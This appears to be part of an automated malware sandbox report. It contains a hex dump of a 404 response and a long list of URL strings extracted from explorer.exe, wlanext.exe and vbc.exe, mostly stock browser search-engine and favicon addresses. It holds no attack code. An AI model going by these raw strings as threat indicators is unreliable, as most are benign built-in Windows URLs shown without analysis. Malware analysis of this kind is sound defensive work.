68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
          Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: wlanext.exe, 00000009.00000002.2401705675.000000000294F000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000007.00000000.2107641557.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000007.00000000.2115039811.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoz
          Source: explorer.exe, 00000007.00000000.2120867977.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
